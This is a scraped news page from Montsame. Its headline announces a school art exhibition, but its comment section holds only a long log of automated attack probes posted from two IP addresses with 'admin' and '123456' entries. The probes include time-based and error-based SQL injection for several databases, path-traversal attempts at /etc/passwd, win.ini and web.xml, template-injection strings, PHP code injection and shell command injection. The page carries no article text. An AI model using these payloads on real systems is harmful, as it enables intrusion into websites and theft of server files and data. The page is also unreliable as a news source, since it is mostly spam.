The English School Of Mongolia сургуулийн сурагчдын "Students art exhibition" уран зургийн үзэсгэлэнг нээх ёслол боллоо

LIVE
montastudio@montsame.gov.mn
2019-03-20 10:52:23
Сэтгэгдлүүд
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',7)='z 185.234.72.114 445 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',0)='y 185.234.72.114 445 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:7 185.234.72.114 445 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 445 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(7))::text>'0 185.234.72.114 445 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 445 өдөр

  123456
 • admin"and(select*from(select+sleep(7))a/**/union/**/select+1)=" 185.234.72.114 445 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 445 өдөр

  123456
 • admin'and(select*from(select+sleep(7))a/**/union/**/select+1)=' 185.234.72.114 445 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 445 өдөр

  123456
 • admin"and"g"="x 185.234.72.114 445 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 445 өдөр

  123456
 • admin"and"z"="z 185.234.72.114 445 өдөр

  123456
 • admin'and'c'='y 185.234.72.114 445 өдөр

  123456
 • admin'and'v'='v 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',7)='n
 • admin 185.234.72.114 445 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',0)='v
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('n',7)
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('m',0)
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:7
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0
 • admin 185.234.72.114 445 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 445 өдөр

  123456
 • admin'"\( 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/
 • admin鎈'"\( 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1412657458')))>'0 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="
 • admin 185.234.72.114 445 өдөр

  <%- 963250798+890099073 %>
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1486165499'))) 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 445 өдөр

  #set($c=964315436+984992417)${c}$c
 • admin/**/and/**/cast(md5('1171555376')as/**/int)>0 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='
 • admin 185.234.72.114 445 өдөр

  ${(954870725+990212153)?c}
 • admin'and(select'1'from/**/cast(md5(1320581065)as/**/int))>'0 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  expr 973543659 + 900063219
 • admin 185.234.72.114 445 өдөр

  ${964637069+818064074}
 • admin 185.234.72.114 445 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • extractvalue(1,concat(char(126),md5(1208919404))) 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456&set /A 952101661+904432408
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 445 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1461194177)))and" 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  (select*from(select+sleep(7)union/**/select+1)a)
 • admin 185.234.72.114 445 өдөр

  /*1*/{{960138129+817722505}}
 • admin 185.234.72.114 445 өдөр

  123456$(expr 829429200 + 984484903)
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 445 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1298995769)))and' 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 445 өдөр

  123456|expr 868842384 + 819280813
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'"\(
 • admin 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456 expr 825402697 + 842159086
 • %u2215etc%u2215passwd 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456鎈'"\(
 • admin 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1542797554')))>'0
 • admin 185.234.72.114 445 өдөр

  123456"and"e"="r
 • /etc/passwdadmin 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1165728450')))
 • /etc/passwd 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456"and"a"="a
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'and'w'='g
 • admin 185.234.72.114 445 өдөр

  123456/**/and/**/cast(md5('1881654911')as/**/int)>0
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'and'z'='z
 • ./../../../../../../etc/passwd 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'and(select'1'from/**/cast(md5(1228552693)as/**/int))>'0
 • ../../../../../../etc/passwdadmin 185.234.72.114 445 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  extractvalue(1,concat(char(126),md5(1834898514)))
 • expr 934601053 + 922541808 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  '-var_dump(md5(476979472))-'
 • admin 185.234.72.114 445 өдөр

  123456/**/and+1=6
 • admin&set /A 949846639+932101307 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  pkinysxinghqwwluchzv
 • admin 185.234.72.114 445 өдөр

  ${@var_dump(md5(431792545))};
 • admin 185.234.72.114 445 өдөр

  123456/**/and+3=3
 • admin 185.234.72.114 445 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1957190386)))and"
 • <%- 803059537+810887009 %> 185.234.72.114 445 өдөр

  123456
 • admin$(expr 925140813 + 963119925) 185.234.72.114 445 өдөр

  123456
 • #set($c=800614688+885084723)${c}$c 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1576796574)))and'
 • admin 185.234.72.114 445 өдөр

  123456
 • admin|expr 939645344 + 808743438 185.234.72.114 445 өдөр

  123456
 • ${860033910+866986970} 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456
 • admin expr 803022313 + 935392169 185.234.72.114 445 өдөр

  123456
 • ${(931610168+986627575)?c} 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  ${927910023+959458174}
 • admin 185.234.72.114 445 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 445 өдөр

  123456
 • ${889989215+911784183} 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456
 • '-var_dump(md5(569879816))-' 185.234.72.114 445 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 445 өдөр

  123456
 • /*1*/{{820792082+816070361}} 185.234.72.114 445 өдөр

  123456
 • pkinysxinghqwwluchzv 185.234.72.114 445 өдөр

  123456
 • ${@var_dump(md5(203046985))}; 185.234.72.114 445 өдөр

  123456
 • admin 185.234.72.114 445 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 445 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 445 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',8)='z 194.163.191.42 445 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 445 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m 194.163.191.42 445 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 445 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:8 194.163.191.42 445 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 445 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 445 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 445 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(8))::text>'0 194.163.191.42 445 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 445 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 445 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 445 өдөр

  123456
 • admin"and(select*from(select+sleep(8))a/**/union/**/select+1)=" 194.163.191.42 445 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 445 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 445 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 445 өдөр

  123456
 • admin'and(select*from(select+sleep(8))a/**/union/**/select+1)=' 194.163.191.42 445 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 445 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 445 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 445 өдөр

  123456
 • admin"and"p"="e 194.163.191.42 445 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 445 өдөр

  123456
 • admin"and"i"="i 194.163.191.42 445 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 445 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 445 өдөр

  123456
 • admin'and'u'='e 194.163.191.42 445 өдөр

  123456
 • admin'and'p'='p 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',8)='z
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',0)='c
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('t',8)
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('f',0)
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:8
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:8'/**/
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(8))::text>'0
 • admin 194.163.191.42 445 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin'"\( 194.163.191.42 445 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(8))>0/**/
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1144100163')))>'0 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 445 өдөр

  <%- 981285290+819979707 %>
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 445 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1901326477'))) 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456"and(select*from(select+sleep(8))a/**/union/**/select+1)="
 • admin 194.163.191.42 445 өдөр

  #set($c=974995200+882264600)${c}$c
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 445 өдөр

  123456
 • admin/**/and/**/cast(md5('1934934666')as/**/int)>0 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 445 өдөр

  ${(977324943+814810174)?c}
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 445 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1128921622)as/**/int))>'0 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'and(select*from(select+sleep(8))a/**/union/**/select+1)='
 • admin 194.163.191.42 445 өдөр

  ${873234171+846628795}
 • %u2215etc%u2215passwd 194.163.191.42 445 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1342374286))) 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  /*1*/{{873302521+858387916}}
 • %2fetc%2fpasswd 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 445 өдөр

  (select*from(select+sleep(8)union/**/select+1)a)
 • /etc/passwdadmin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  expr 839111185 + 822840463
 • admin"and/**/extractvalue(1,concat(char(126),md5(1789288803)))and" 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • /etc/passwd 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456&set /A 800052742+969049994
 • admin'and/**/extractvalue(1,concat(char(126),md5(1558310651)))and' 194.163.191.42 445 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456$(expr 852527922 + 932118172)
 • admin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'"\(
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456|expr 895971172 + 892346694
 • ./../../../../../../etc/passwd 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456鎈'"\(
 • ../../../../../../etc/passwdadmin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1801268278')))>'0
 • admin 194.163.191.42 445 өдөр

  123456"and"p"="q
 • admin 194.163.191.42 445 өдөр

  123456 expr 835640298 + 939156967
 • admin 194.163.191.42 445 өдөр

  123456"and"z"="z
 • ../../../../../../etc/passwd 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1586594833')))
 • admin 194.163.191.42 445 өдөр

  123456/**/and/**/cast(md5('1717919532')as/**/int)>0
 • admin 194.163.191.42 445 өдөр

  123456'and'c'='z
 • admin 194.163.191.42 445 өдөр

  123456'and(select'1'from/**/cast(md5(1798163106)as/**/int))>'0
 • <%- 806088433+905786565 %> 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'and'g'='g
 • #set($c=863232832+846776389)${c}$c 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  extractvalue(1,concat(char(126),md5(1770038907)))
 • '-var_dump(md5(967872113))-' 194.163.191.42 445 өдөр

  123456
 • ${(869344461+841829400)?c} 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456/**/and+3=8
 • admin 194.163.191.42 445 өдөр

  123456/**/and+2=2
 • admin 194.163.191.42 445 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1034244017)))and"
 • ${@var_dump(md5(276612211))}; 194.163.191.42 445 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  '-var_dump(md5(179623245))-'
 • expr 812674026 + 868438869 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1117856892)))and'
 • admin 194.163.191.42 445 өдөр

  ${@var_dump(md5(980375139))};
 • shuyozamoaxbhnieqsil 194.163.191.42 445 өдөр

  123456
 • admin&set /A 932824381+816660317 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • ${980953900+855382678} 194.163.191.42 445 өдөр

  123456
 • admin$(expr 912065771 + 817387405) 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • admin|expr 930493073 + 904415767 194.163.191.42 445 өдөр

  123456
 • ${827554216+929172441} 194.163.191.42 445 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  shuyozamoaxbhnieqsil
 • admin 194.163.191.42 445 өдөр

  ${919283442+949897040}
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 445 өдөр

  123456
 • admin expr 965081238 + 844319726 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • /*1*/{{884683083+891406676}} 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 445 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',11)='r
 • admin 194.163.191.42 480 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',0)='o
 • admin 194.163.191.42 480 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('g',11)
 • admin 194.163.191.42 480 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('g',0)
 • admin 194.163.191.42 480 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:11
 • admin 194.163.191.42 480 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 480 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:11'/**/
 • admin 194.163.191.42 480 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 480 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(11))::text>'0
 • admin 194.163.191.42 480 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 480 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(11))>0/**/
 • admin 194.163.191.42 480 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 480 өдөр

  123456"and(select*from(select+sleep(11))a/**/union/**/select+1)="
 • admin 194.163.191.42 480 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 480 өдөр

  123456'and(select*from(select+sleep(11))a/**/union/**/select+1)='
 • admin 194.163.191.42 480 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  (select*from(select+sleep(11)union/**/select+1)a)
 • ../../../../WEB-INF/web.xml 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456"and"w"="f
 • ../../../WEB-INF/web.xml 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456"and"e"="e
 • ../../WEB-INF/web.xml;admin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456'and'i'='x
 • ../../WEB-INF/web.xml 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456'and'v'='v
 • ../WEB-INF/web.xml;admin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456/**/and+4=8
 • ../WEB-INF/web.xml 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456/**/and+3=3
 • WEB-INF/web.xml;admin 194.163.191.42 480 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 480 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 480 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 480 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 480 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 480 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456'"\(
 • admin 194.163.191.42 480 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 480 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1408322195')))>'0
 • admin 194.163.191.42 480 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1106318689')))
 • admin 194.163.191.42 480 өдөр

  123456/**/and/**/cast(md5('1231952872')as/**/int)>0
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456'and(select'1'from/**/cast(md5(1384929643)as/**/int))>'0
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  extractvalue(1,concat(char(126),md5(1652634902)))
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 480 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1617538110)))and"
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1215313372)))and'
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 480 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 480 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 480 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',11)='r 194.163.191.42 480 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z 194.163.191.42 480 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:11 194.163.191.42 480 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 480 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(11))::text>'0 194.163.191.42 480 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 480 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 480 өдөр

  123456
 • admin"and(select*from(select+sleep(11))a/**/union/**/select+1)=" 194.163.191.42 480 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 480 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 480 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 480 өдөр

  123456
 • admin'and(select*from(select+sleep(11))a/**/union/**/select+1)=' 194.163.191.42 480 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 480 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 480 өдөр

  123456
 • expr 952261079 + 873715072 194.163.191.42 480 өдөр

  123456
 • admin 194.163.191.42 480 өдөр

  123456
 • admin&set /A 899224637+957400877 194.163.191.42 480 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 480 өдөр

  123456
 • admin'"\( 194.163.191.42 480 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 480 өдөр

  123456
